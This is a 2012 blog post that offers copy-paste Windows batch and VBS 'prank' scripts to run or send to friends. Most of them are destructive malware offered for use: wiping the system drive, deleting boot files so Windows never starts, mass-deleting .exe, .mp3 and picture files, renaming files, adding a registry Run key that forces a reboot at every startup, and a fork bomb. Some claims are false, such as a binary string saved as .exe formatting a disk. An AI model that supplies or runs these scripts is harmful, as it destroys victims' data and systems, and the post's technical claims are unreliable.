Trickmaker | Solution to hidden treasure of technology
Register or
Login with Facebook for commenting
RSS Trickmaker Home Page Print the Page Mobile Version Trickmaker Desktop Version Trickmaker
advertisement

Be a Guest Blogger

Wednesday, January 4, 2012

Some Really Funny, Also Dangerous JAVA Scripts

By
Pin It
advertisement
Share It
-----------------------






Hey, friends today i will be telling you some Dangerous/Funny pranks for your pc, But use them at your own risk, and i am not responsible for any harm that is caused to your pc by using these scripts. So, USE AT YOUR OWN RISK !!!!

Continually pop out your friend’s CD Drive. If he / she has more than one, it pops out all of them!

Copy the below code in notepad and save it as anything.vbs

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

-------------------------------------------------------------------------------------------

Open notepad continually....

Copy paste the code in notepad and save it as anything.bat

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
-------------------------------------------------------------------------------------------

Dangerous Code....

This is a simple code that formats HDD.

It also makes bad sectors.

Write the following in notepad exactly as it says

01001011000111110010010101010101010000011111100000

Save as anything.exe

I am not responsible for any harm.

-------------------------------------------------------------------------------------------

Type this in notepad.

start virus.bat

and save as with this name

virus.bat

-------------------------------------------------------------------------------------------

Funny Code

Copy this Code in Notepad...

@echo OFF
title Virus Detected Do Not Close Window
echo Virus Detected attempting to remove virus...
echo (press any key to continue)
pause >nul
echo Virus is spreading throughout the system...
echo (press any key to destroy)
pause >nul
echo destroying virus...
echo (press any key to continue)
pause >nul
echo files deleted to destroy virus
echo (press any key to cancel)
pause >nul
taskkill /f /im explorer.exe
cls
echo cancel failed
echo (press any key to restore)
pause >nulecho files restored
start /im explorer.exe
cls
echo files restored
echo (press any key to continue)
pause >nul
echo checking for virus...
echo virus still detected
echo (press any key to destroy)
pause >nul
echo virus is destroyed
echo (press any key to exit)
pause >nul
shutdown -s -t 5 -c "virus infected everything Windows is shuting down"

Remember to save this as a batch file by adding at the end .bat

-------------------------------------------------------------------------------------------

Shutdowns Computer Everytime It Is Turned On..Save As A bat File

echo @echo off>c:windowshartlell.bat
echo break off>>c:windowshartlell.bat
echo shutdown -r -t 11 -f>>c:windowshartlell.bat
echo end>>c:windowshartlell.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d c:windowshartlell.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d c:windowshartlell.bat /f
echo You have been HACKED.
PAUSE

-------------------------------------------------------------------------------------------

Change files to non-working TXT files Every file is changed to .txt
(save as txt.bat)

REN *.DOC *.TXT
REN *.JPEG *.TXT
REN *.LNK *.TXT
REN *.AVI *.TXT
REN *.MPEG *.TXT
REN *.COM *.TXT
REN *.BAT *.TXT

-------------------------------------------------------------------------------------------

It will delete all contents of System drive...

Copy paste the code in notepad and save it as anything.bat

@echo off

del %systemdrive%\*.*/f/s/q

shutdown -r -f -t 00

-------------------------------------------------------------------------------------------


Code that crashesh your own pc.

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive

save as anything.bat file in notepad!!
This will pop up a message saying OWNED!!
and shut down the windows never to start again!

-------------------------------------------------------------------------------------------

Toggle your friend's Caps Lock button simultaneously:
Type in notepad

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

-------------------------------------------------------------------------------------------

Very simple code to delete my picture's....

del /f /q '%userprofile%\My Pictures\*.*'


copy paste the code in notepad and save it as anything.bat

-------------------------------------------------------------------------------------------

Delete all .exe file's...

DIR /S/B %SystemDrive%\*.exe >> FIleList_exe.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_exe.txt) do del "%%j:%%k"


Copy paste the code in notepad and save it as anything.bat

-------------------------------------------------------------------------------------------

Delete all mp3 file's

DIR /S/B %SystemDrive%\*.mp3 >> FIleList_mp3.txt
echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_mp3.txt) do del "%%j:%%k"

Copy paste the code in notepad and save it as anything.bat

-------------------------------------------------------------------------------------------

Cool Matrix code ( you can try it, its safe)

@echo off
color 2
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start


copy paste the code in notepad and save it as anything.bat

-------------------------------------------------------------------------------------------

Message Box...


Dim strMessage
strMessage = "Type Your text here"
MsgBox strMessage

Copy the above code in notepad and save it as anything.vbs


-------------------------------------------------------------------------------------------

Message box with ur own title. (try it)

Copy paste the below code in notepad ans save it as anythiing.vbs, edit the code....

X = msgbox ("Type your Message here", 1024, "Type your title here")

-------------------------------------------------------------------------------------------

Open CD drive with click...

Copy the code in notepad and save it as anything.vbs

Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
colCDROMs.Item(i).Eject

-------------------------------------------------------------------------------------------

Open Wordpad And Send Keys...

Its really funny, copy paste the code to notepad and save it as anything.vbs and enjoy

Get code from here

http://tinypaste.com/5a365

-------------------------------------------------------------------------------------------

Attachments:


If you LIKE this, then copy the below and put this in your WEBSITE or BLOG